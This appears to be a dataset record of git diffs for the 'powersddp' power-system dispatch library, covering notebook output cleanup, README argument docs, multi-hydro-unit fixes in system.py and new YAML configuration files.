,\"#ed7953\"],[0.7777777777777778,\"
#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"contour\"}],\"contourcarpet\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"contourcarpet\"}],\"heatmap\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmap\"}],\"heatmapgl\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmapgl\"}],\"histogram\":[{\"marker\":{\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"histogram\"}],\"histogram2d\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2d\"}],\"histogram2dcontour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2dcontour\"}],\"mesh3d\":[{\"colorbar\":{\"outlinewidth\":0,\"
ticks\":\"\"},\"type\":\"mesh3d\"}],\"parcoords\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"parcoords\"}],\"pie\":[{\"automargin\":true,\"type\":\"pie\"}],\"scatter\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter\"}],\"scatter3d\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter3d\"}],\"scattercarpet\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattercarpet\"}],\"scattergeo\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergeo\"}],\"scattergl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergl\"}],\"scattermapbox\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattermapbox\"}],\"scatterpolar\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolar\"}],\"scatterpolargl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolargl\"}],\"scatterternary\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterternary\"}],\"surface\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"surface\"}],\"table\":[{\"cells\":{\"fill\":{\"color\":\"#EBF0F8\"},\"line\":{\"color\":\"white\"}},\"header\":{\"fill\":{\"color\":\"#C8D4E3\"},\"line\":{\"color\":\"white\"}},\"type\":\"table\"}]},\"layout\":{\"annotationdefaults\":{\"arrowcolor\":\"#2a3f5f\",\"arrowhead\":0,\"arrowwidth\":1},\"autotypenumbers\":\"strict\",\"coloraxis\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"co
lorscale\":{\"diverging\":[[0,\"#8e0152\"],[0.1,\"#c51b7d\"],[0.2,\"#de77ae\"],[0.3,\"#f1b6da\"],[0.4,\"#fde0ef\"],[0.5,\"#f7f7f7\"],[0.6,\"#e6f5d0\"],[0.7,\"#b8e186\"],[0.8,\"#7fbc41\"],[0.9,\"#4d9221\"],[1,\"#276419\"]],\"sequential\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"sequentialminus\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]]},\"colorway\":[\"#636efa\",\"#EF553B\",\"#00cc96\",\"#ab63fa\",\"#FFA15A\",\"#19d3f3\",\"#FF6692\",\"#B6E880\",\"#FF97FF\",\"#FECB52\"],\"font\":{\"color\":\"#2a3f5f\"},\"geo\":{\"bgcolor\":\"white\",\"lakecolor\":\"white\",\"landcolor\":\"#E5ECF6\",\"showlakes\":true,\"showland\":true,\"subunitcolor\":\"white\"},\"hoverlabel\":{\"align\":\"left\"},\"hovermode\":\"closest\",\"mapbox\":{\"style\":\"light\"},\"paper_bgcolor\":\"white\",\"plot_bgcolor\":\"#E5ECF6\",\"polar\":{\"angularaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"radialaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"scene\":{\"xaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"yaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"zaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showb
ackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"}},\"shapedefaults\":{\"line\":{\"color\":\"#2a3f5f\"}},\"ternary\":{\"aaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"baxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"caxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"title\":{\"x\":0.05},\"xaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2},\"yaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2}}},\"title\":{\"text\":\"Future Cost Function\"},\"xaxis\":{\"anchor\":\"y\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis2\":{\"anchor\":\"y2\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis3\":{\"anchor\":\"y3\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"yaxis\":{\"anchor\":\"x\",\"domain\":[0.7333333333333333,1.0],\"title\":{\"text\":\"$/MW\"}},\"yaxis2\":{\"anchor\":\"x2\",\"domain\":[0.36666666666666664,0.6333333333333333],\"title\":{\"text\":\"$/MW\"}},\"yaxis3\":{\"anchor\":\"x3\",\"domain\":[0.0,0.26666666666666666],\"title\":{\"text\":\"$/MW\"}}}, {\"responsive\": true} ).then(function(){\n",
- " \n",
- "var gd = document.getElementById('5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25');\n",
- "var x = new MutationObserver(function (mutations, observer) {{\n",
- " var display = window.getComputedStyle(gd).display;\n",
- " if (!display || display === 'none') {{\n",
- " console.log([gd, 'removed!']);\n",
- " Plotly.purge(gd);\n",
- " observer.disconnect();\n",
- " }}\n",
- "}});\n",
- "\n",
- "// Listen for the removal of the full notebook cells\n",
- "var notebookContainer = gd.closest('#notebook-container');\n",
- "if (notebookContainer) {{\n",
- " x.observe(notebookContainer, {childList: true});\n",
- "}}\n",
- "\n",
- "// Listen for the clearing of the current output cell\n",
- "var outputEl = gd.closest('.output');\n",
- "if (outputEl) {{\n",
- " x.observe(outputEl, {childList: true});\n",
- "}}\n",
- "\n",
- " }) }; }); </script> </div>"
- ]
- },
- "metadata": {},
- "output_type": "display_data"
- }
- ],
+ "outputs": [],
"source": [
"from itertools import product\n",
"import numpy as np\n",
@@ -1297,123 +270,10 @@
},
{
"cell_type": "code",
- "execution_count": 13,
+ "execution_count": null,
"id": "87285cd1-3bb7-4c72-bb43-4f2baf6e4077",
"metadata": {},
- "outputs": [
- {
- "data": {
- "text/html": [
- "<div>\n",
- "<style scoped>\n",
- " .dataframe tbody tr th:only-of-type {\n",
- " vertical-align: middle;\n",
- " }\n",
- "\n",
- " .dataframe tbody tr th {\n",
- " vertical-align: top;\n",
- " }\n",
- "\n",
- " .dataframe thead th {\n",
- " text-align: right;\n",
- " }\n",
- "</style>\n",
- "<table border=\"1\" class=\"dataframe\">\n",
- " <thead>\n",
- " <tr style=\"text-align: right;\">\n",
- " <th></th>\n",
- " <th>stage</th>\n",
- " <th>discretization</th>\n",
- " <th>v_i</th>\n",
- " <th>average_cost</th>\n",
- " </tr>\n",
- " </thead>\n",
- " <tbody>\n",
- " <tr>\n",
- " <th>0</th>\n",
- " <td>3</td>\n",
- " <td>0.0</td>\n",
- " <td>20.0</td>\n",
- " <td>6725.00</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>1</th>\n",
- " <td>3</td>\n",
- " <td>50.0</td>\n",
- " <td>60.0</td>\n",
- " <td>7.75</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>2</th>\n",
- " <td>3</td>\n",
- " <td>100.0</td>\n",
- " <td>100.0</td>\n",
- " <td>-0.00</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>3</th>\n",
- " <td>2</td>\n",
- " <td>0.0</td>\n",
- " <td>20.0</td>\n",
- " <td>11787.50</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>4</th>\n",
- " <td>2</td>\n",
- " <td>50.0</td>\n",
- " <td>60.0</td>\n",
- " <td>226.93</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>5</th>\n",
- " <td>2</td>\n",
- " <td>100.0</td>\n",
- " <td>100.0</td>\n",
- " <td>0.62</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>6</th>\n",
- " <td>1</td>\n",
- " <td>0.0</td>\n",
- " <td>20.0</td>\n",
- " <td>15425.00</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>7</th>\n",
- " <td>1</td>\n",
- " <td>50.0</td>\n",
- " <td>60.0</td>\n",
- " <td>576.31</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>8</th>\n",
- " <td>1</td>\n",
- " <td>100.0</td>\n",
- " <td>100.0</td>\n",
- " <td>161.68</td>\n",
- " </tr>\n",
- " </tbody>\n",
- "</table>\n",
- "</div>"
- ],
- "text/plain": [
- " stage discretization v_i average_cost\n",
- "0 3 0.0 20.0 6725.00\n",
- "1 3 50.0 60.0 7.75\n",
- "2 3 100.0 100.0 -0.00\n",
- "3 2 0.0 20.0 11787.50\n",
- "4 2 50.0 60.0 226.93\n",
- "5 2 100.0 100.0 0.62\n",
- "6 1 0.0 20.0 15425.00\n",
- "7 1 50.0 60.0 576.31\n",
- "8 1 100.0 100.0 161.68"
- ]
- },
- "execution_count": 13,
- "metadata": {},
- "output_type": "execute_result"
- }
- ],
+ "outputs": [],
"source": [
"operation_df"
]
@@ -1510,7 +370,7 @@
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
- "version": "3.8.6"
+ "version": "3.7.9"
}
},
"nbformat": 4,
diff --git a/README.md b/README.md
index f2d7ecb..b3a32d4 100644
--- a/README.md
+++ b/README.md
@@ -74,12 +74,19 @@ print("System Load: {}\n"
#### **dispatch()** accepts the following arguments:
+- `solver : str, optional defaults to 'sdp'`
+ - Selects the solver option for the minimization objective function.
+
+- `scenario : int, optional defaults to 0`
+  - Chooses either a specific scenario to investigate (`scenario >= 1`) or evaluates all scenarios (`scenario = 0`). Specific scenario ids run from 1 up to the number of scenarios declared in the `hydro_units['inflow_scenarios']` parameter.
+
- `verbose : bool, optional defaults to False`
- Displays the PDDE solution for every stage of the execution. Use with care, solutions of complex systems with too many stages and scenarios might overflow the console.
- `plot : bool, optional, defaults to False`
- Displays a sequence of plots showing the future cost function for every stage of the execution.
+The following example executes the Power System dispatch using the Unique Linear Programming method for the first scenario (id = 1) and outputs the optimization steps.
```Python
import powersddp as psddp
@@ -100,7 +107,7 @@ data = {'load': [50, 50, 50],
{'name': 'GT2', 'capacity': 10, 'cost': 25}]}
PowerSystem = psddp.PowerSystem(data=data)
-operation = PowerSystem.dispatch()
+operation = PowerSystem.dispatch(solver='ulp', scenario=1, verbose=True)
print(operation)
```
diff --git a/powersddp/core/system.py b/powersddp/core/system.py
index 38119d2..b25a00c 100644
--- a/powersddp/core/system.py
+++ b/powersddp/core/system.py
@@ -208,21 +208,25 @@ def dispatch(
)
coef_b -= v_i[i] * avg_water_marginal_cost[i]
- cuts.append(
- {
- "stage": stage,
- "coef_b": coef_b,
- "coefs": avg_water_marginal_cost,
- }
- )
- operation.append(
- {
- "stage": stage,
- "storage_percentage": "{}%".format(int(discretization[i])),
- "initial_volume": v_i[0],
- "average_cost": round(average, 2),
- }
- )
+ cuts.append(
+ {
+ "stage": stage,
+ "coef_b": coef_b,
+ "coefs": avg_water_marginal_cost,
+ }
+ )
+ operation.append(
+ {
+ "stage": stage,
+ "name": self.data["hydro_units"][i]["name"],
+ "storage_percentage": "{}%".format(
+ int(discretization[i])
+ ),
+ "initial_volume": v_i[i],
+ "average_cost": round(average, 2),
+ }
+ )
+ self.cuts = cuts
operation_df = pd.DataFrame(operation)
if n_hgu == 1 and plot:
@@ -244,13 +248,17 @@ def dispatch(
gu_operation=result["hydro_units"],
yaxis_column="vf",
yaxis_title="HGU Volume (hm3)",
- plot_title="HGU Stored Volume on Scenario {}".format(scn + 1),
+ plot_title="HGU Stored Volume on Scenario {}".format(
+ scn + 1
+ ),
)
plot_ulp(
gu_operation=result["thermal_units"],
yaxis_column="gt",
yaxis_title="Power Generation (MWmed)",
- plot_title="TGU Power Generation on Scenario {}".format(scn + 1),
+ plot_title="TGU Power Generation on Scenario {}".format(
+ scn + 1
+ ),
)
else:
result = ulp(
@@ -274,3 +282,5 @@ def dispatch(
scenario
),
)
+
+ return result
diff --git a/pyproject.toml b/pyproject.toml
index 20c24e8..a8e194a 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -2,7 +2,9 @@
name = "powersddp"
version = "0.0.2"
description = "A Stochastic Dual Dynamic Programming library to solve economic dispatch of power systems."
-authors = ["Ettore Aquino <[email protected]>", "João Pedro Peters <[email protected]>"]
+authors = ["Ettore Aquino <[email protected]>",
+ "João Pedro Peters <[email protected]>",
+ "Pedro Henrique Peters <[email protected]>"]
repository = "https://github.com/ettoreaquino/powersddp.git"
diff --git a/system-2hgu-hydro.yml b/system-2hgu-hydro.yml
new file mode 100644
index 0000000..21c0075
--- /dev/null
+++ b/system-2hgu-hydro.yml
@@ -0,0 +1,22 @@
+-
+ name: HU1
+ v_max: 100
+ v_min: 20
+ v_ini: 100
+ prod: 0.95
+ flow_max: 60
+ inflow_scenarios:
+ - [23,16]
+ - [19,14]
+ - [15,11]
+-
+ name: HU2
+ v_max: 200
+ v_min: 40
+ v_ini: 200
+ prod: 0.85
+ flow_max: 100
+ inflow_scenarios:
+ - [46,32]
+ - [38,28]
+ - [30,22]
\ No newline at end of file
diff --git a/system-2hgu.yml b/system-2hgu.yml
new file mode 100644
index 0000000..e513d7c
--- /dev/null
+++ b/system-2hgu.yml
@@ -0,0 +1,7 @@
+load: [150,150,150]
+discretizations: 3
+stages: 3
+scenarios: 2
+outage_cost: 500
+hydro_units: !include system-2hgu-hydro.yml
+thermal_units: !include system-thermal.yml
\ No newline at end of file
| Multiple HGUs are now shown in the operation output
## Comments
> Closes #13
Multiple HGUs now working
| 2021-08-25T23:05:16 | 0.0 | [] | [] |
|||
ettoreaquino/powersddp | ettoreaquino__powersddp-7 | 6afd1a5889d000fa566e44d319d98fa82c24af76 | diff --git a/Notebook.ipynb b/Notebook.ipynb
index 18782e2..1eb6b54 100644
--- a/Notebook.ipynb
+++ b/Notebook.ipynb
@@ -2,27 +2,19 @@
"cells": [
{
"cell_type": "code",
- "execution_count": 1,
+ "execution_count": 2,
"id": "9dd8e6a5-b075-404b-85eb-6131fcca2a2a",
"metadata": {},
- "outputs": [
- {
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System loaded from system.yml file\n"
- ]
- }
- ],
+ "outputs": [],
"source": [
- "from powersddp.system import PowerSystem\n",
- "import cvxopt.modeling as model\n",
+ "import powersddp as psddp\n",
"\n",
- "data = {'load': [50, 50, 50],\n",
+ "\n",
+ "data = {'load': [100, 15, 50],\n",
" 'discretizations': 3,\n",
" 'stages': 3,\n",
" 'scenarios': 2,\n",
- " 'shedding_cost': 500,\n",
+ " 'outage_cost': 500,\n",
" 'hydro-units': [{'name': 'HU1',\n",
" 'v_max': 100,\n",
" 'v_min': 20,\n",
@@ -32,7 +24,20 @@
" 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
" {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
"\n",
- "TestSystem = PowerSystem(path='system.yml')"
+ "TestSystem = psddp.PowerSystem(data=data)"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 6,
+ "id": "0b41801a-dc45-4777-a2ec-1294c91890cc",
+ "metadata": {
+ "scrolled": true,
+ "tags": []
+ },
+ "outputs": [],
+ "source": [
+ "operation = TestSystem.dispatch()"
]
},
{
@@ -66,7 +71,7 @@
" \\begin{aligned}\n",
" \\min \\quad & C_1\\cdot g_{t_1} + C_2\\cdot g_{t_2} + C_{def}\\cdot def + 0.01\\cdot v_v\\\\\n",
" \\textrm{s.t.} \\quad & \\\\\n",
- " \\textrm{hydro balance} \\quad & v_f = v_i + afl - v_t \\\\\n",
+ " \\textrm{hydro balance} \\quad & v_f(i) = v_i(i) + afl(i) - v_t(i) \\\\\n",
" \\textrm{load supplying} \\quad & \\rho\\cdot v_t + g_{t_1} + g_{t_2} + def = \\textrm{load}\\\\\n",
" \\textrm{constraints} \\quad & \\\\\n",
" & v_{f_{min}}\\leq v_f \\leq v_{f_{max}}\\\\\n",
@@ -83,15 +88,24 @@
},
{
"cell_type": "code",
- "execution_count": 4,
+ "execution_count": 16,
"id": "ccbf3a14-01ed-4942-acb3-a4c64f47b6fd",
"metadata": {},
"outputs": [],
"source": [
- "def dispatch(system, v_i, inflow):\n",
+ "import cvxopt.modeling as model\n",
+ "from cvxopt import solvers\n",
+ "\n",
+ "import pandas as pd\n",
+ "import plotly.graph_objects as go\n",
+ "from plotly.subplots import make_subplots\n",
+ "\n",
+ "solvers.options['glpk'] = dict(msg_lev='GLP_MSG_OFF')\n",
+ "\n",
+ "def dispatch(system, v_i, inflow, cuts, stage, verbose:bool=False):\n",
" n_tgu = len(system.data['thermal-units'])\n",
" n_hgu = len(system.data['hydro-units'])\n",
- "\n",
+ " solvers.options['show_progress'] = verbose\n",
"\n",
" ## Initializing Model Variables\n",
" v_f = model.variable(n_hgu, \"Final Volume of the Hydro Unit\")\n",
@@ -99,6 +113,7 @@
" v_v = model.variable(n_hgu, \"Shed flow of the Hydro Unit\")\n",
" g_t = model.variable(n_tgu, \"Power generated by the Thermal Unit\")\n",
" deficit = model.variable(1, \"Power deficit\")\n",
+ " alpha = model.variable(1, \"Future Cost\")\n",
"\n",
" ## Objective Function\n",
" fob = 0\n",
@@ -107,14 +122,17 @@
" fob+=TestSystem.data['outage_cost']*deficit[0]\n",
" for i, _ in enumerate(system.data['hydro-units']):\n",
" fob += 0.01*v_v[i]\n",
+ " fob += 1.0 * alpha[0]\n",
"\n",
- " ## Hydro Balance\n",
+ " ## Constraints\n",
+ " \n",
+ " ### Hydro Balance\n",
" constraints = []\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
- " constraints.append( v_f[i] == v_i + inflow - v_t[i] - v_v[i] )\n",
+ " constraints.append( v_f[i] == float(v_i[i]) + float(inflow[i]) - v_t[i] - v_v[i] )\n",
"\n",
" supplying = 0\n",
- " ## Load Supplying\n",
+ " ### Load Supply\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
" supplying += hgu[\"prod\"] * v_t[i]\n",
"\n",
@@ -123,9 +141,10 @@
"\n",
" supplying += deficit[0]\n",
"\n",
- " constraints.append(supplying == system.data['load'][2])\n",
+ " constraints.append(supplying == system.data['load'][stage-2])\n",
+ " \n",
"\n",
- " ## Constraints\n",
+ " ### Bounds\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
" constraints.append(v_f[i] >= hgu[\"v_min\"])\n",
" constraints.append(v_f[i] <= hgu[\"v_max\"])\n",
@@ -138,152 +157,1341 @@
" constraints.append(g_t[i] <= tgu[\"capacity\"])\n",
"\n",
" constraints.append(deficit[0] >= 0)\n",
+ " constraints.append(alpha[0] >= 0)\n",
" \n",
+ " ### Cut constraint (Future cost function of forward stage)\n",
+ " for cut in cuts:\n",
+ " if cut['stage'] == stage:\n",
+ " equation = 0\n",
+ " for hgu in range(n_hgu):\n",
+ " equation += float(cut['coefs'][hgu])*v_f[hgu]\n",
+ " equation += float(cut['coef_b'])\n",
+ " constraints.append(alpha[0] >= equation)\n",
+ " \n",
+ " ## Solving\n",
" opt_problem = model.op(objective=fob, constraints=constraints)\n",
" opt_problem.solve(format='dense',solver='glpk')\n",
"\n",
- " print(\"Total Cost: {}\".format(fob.value()))\n",
+ " ## Print\n",
+ " if verbose:\n",
+ " print(\"Total Cost: {}\".format(fob.value()))\n",
"\n",
- " for i, hgu in enumerate(system.data['hydro-units']):\n",
- " print(\"{} {} is {} hm3\".format(v_f.name,i,v_f[i].value()))\n",
- " print(\"{} {} is {} hm3\".format(v_t.name,i,v_t[i].value()))\n",
- " print(\"{} {} is {} hm3\".format(v_v.name,i,v_v[i].value()))\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"{} {} is {} hm3\".format(v_f.name,i,v_f[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_t.name,i,v_t[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_v.name,i,v_v[i].value()))\n",
"\n",
- " for i, tgu in enumerate(system.data['thermal-units']):\n",
- " print(\"{} {} is {} MWmed\".format(g_t.name,i,g_t[i].value()))\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " print(\"{} {} is {} MWmed\".format(g_t.name,i,g_t[i].value()))\n",
"\n",
- " print(\"{} is {} MWmed\".format(deficit.name,deficit[0].value()))\n",
+ " print(\"{} is {} MWmed\".format(deficit.name,deficit[0].value()))\n",
"\n",
- " for i, hgu in enumerate(system.data['hydro-units']):\n",
- " print(\"The cost of water at Hydro Unit {} is {} hm3\".format(i,constraints[i].multiplier.value))\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+    "        print(\"The cost of water at Hydro Unit {} is {} $/hm3\".format(i,constraints[i].multiplier.value))\n",
"\n",
- " print(\"The Marginal Cost is: {}\".format(constraints[n_hgu].multiplier.value))"
- ]
- },
- {
- "cell_type": "code",
- "execution_count": 5,
- "id": "17fb0a0c-5a87-41fb-a645-1434a65c02d4",
- "metadata": {},
- "outputs": [
- {
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "Total Cost: [ 7.67e+03]\n",
- "\n",
- "Final Volume of the Hydro Unit 0 is [ 2.00e+01]\n",
- " hm3\n",
- "Turbined Flow of the Hydro Unit 0 is [ 1.10e+01]\n",
- " hm3\n",
- "Shed flow of the Hydro Unit 0 is [ 0.00e+00]\n",
- " hm3\n",
- "Power generated by the Thermal Unit 0 is [ 1.50e+01]\n",
- " MWmed\n",
- "Power generated by the Thermal Unit 1 is [ 1.00e+01]\n",
- " MWmed\n",
- "Power deficit is [ 1.45e+01]\n",
- " MWmed\n",
- "The cost of water at Hydro Unit 0 is [ 4.75e+02]\n",
- " hm3\n",
- "The Marginal Cost is: [-5.00e+02]\n",
- "\n",
- "GLPK Simplex Optimizer, v4.65\n",
- "12 rows, 6 columns, 17 non-zeros\n",
- " 0: obj = 0.000000000e+00 inf = 1.010e+02 (3)\n",
- " 5: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
- "* 6: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
- "OPTIMAL LP SOLUTION FOUND\n"
- ]
- }
- ],
- "source": [
- "system = TestSystem\n",
- "v_i = 20\n",
- "inflow = 11\n",
+ " print(\"The Marginal Cost is: {}\".format(constraints[n_hgu].multiplier.value))\n",
+ " \n",
+ " return {\n",
+ " \"deficit\": deficit[0].value()[0],\n",
+ " \"operational_marginal_cost\": constraints[n_hgu].multiplier.value[0],\n",
+ " \"total_cost\": fob.value()[0],\n",
+ " \"future_cost\": alpha[0].value()[0],\n",
+ " \"hydro_units\": [{\n",
+ " \"v_f\": v_f[i].value()[0],\n",
+ " \"v_t\": v_t[i].value()[0],\n",
+ " \"v_v\": v_v[i].value()[0],\n",
+ " \"water_marginal_cost\": constraints[i].multiplier.value[0]} for i in range(n_hgu)],\n",
+ " \"thermal_units\": [{\"g_t\": g_t[i].value()[0]} for i in range(n_tgu)]\n",
+ " }\n",
+ "\n",
+ "def plot_future_cost_function(operation: pd.DataFrame):\n",
+ " \n",
+ " n_stages = len(operation['stage'].unique())\n",
+ " \n",
+ " fig = make_subplots(rows=n_stages, cols=1)\n",
+ "\n",
+ " i = 1\n",
+ " for stage in operation['stage'].unique():\n",
+ " stage_df = operation.loc[operation['stage'] == stage] \n",
+ " fig.add_trace(go.Scatter(x=stage_df[\"v_i\"],\n",
+ " y=stage_df['average_cost'],\n",
+ " mode='lines',\n",
+ " name=\"Stage {}\".format(i)), row=stage, col=1)\n",
+ " i+=1\n",
"\n",
- "dispatch(system=system, v_i=v_i, inflow=inflow)"
+ " fig.update_xaxes(title_text=\"Final Volume [hm3]\")\n",
+ " fig.update_yaxes(title_text=\"$/MW\")\n",
+ "\n",
+    "    fig.update_layout(height=300*n_stages, title_text=\"Future Cost Function\")\n",
+ " fig.show()"
]
},
{
"cell_type": "code",
- "execution_count": 9,
- "id": "108fdcb5-9ce2-49db-b487-eeaf90ec0e24",
- "metadata": {},
+ "execution_count": 17,
+ "id": "2b718ada-dd91-4cb6-a31c-f36b61674065",
+ "metadata": {
+ "tags": []
+ },
"outputs": [
{
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System Load: [50, 50, 50]\n",
- "Number of HGUs: 1\n",
- "Number of TGUs: 2\n"
- ]
+ "data": {
+ "application/vnd.plotly.v1+json": {
+ "config": {
+ "plotlyServerURL": "https://plot.ly"
+ },
+ "data": [
+ {
+ "mode": "lines",
+ "name": "Stage 1",
+ "type": "scatter",
+ "x": [
+ 20,
+ 60,
+ 100
+ ],
+ "xaxis": "x3",
+ "y": [
+ 6725,
+ 7.75,
+ 0
+ ],
+ "yaxis": "y3"
+ },
+ {
+ "mode": "lines",
+ "name": "Stage 2",
+ "type": "scatter",
+ "x": [
+ 20,
+ 60,
+ 100
+ ],
+ "xaxis": "x2",
+ "y": [
+ 11787.5,
+ 226.93,
+ 0.62
+ ],
+ "yaxis": "y2"
+ },
+ {
+ "mode": "lines",
+ "name": "Stage 3",
+ "type": "scatter",
+ "x": [
+ 20,
+ 60,
+ 100
+ ],
+ "xaxis": "x",
+ "y": [
+ 15425,
+ 576.31,
+ 161.68
+ ],
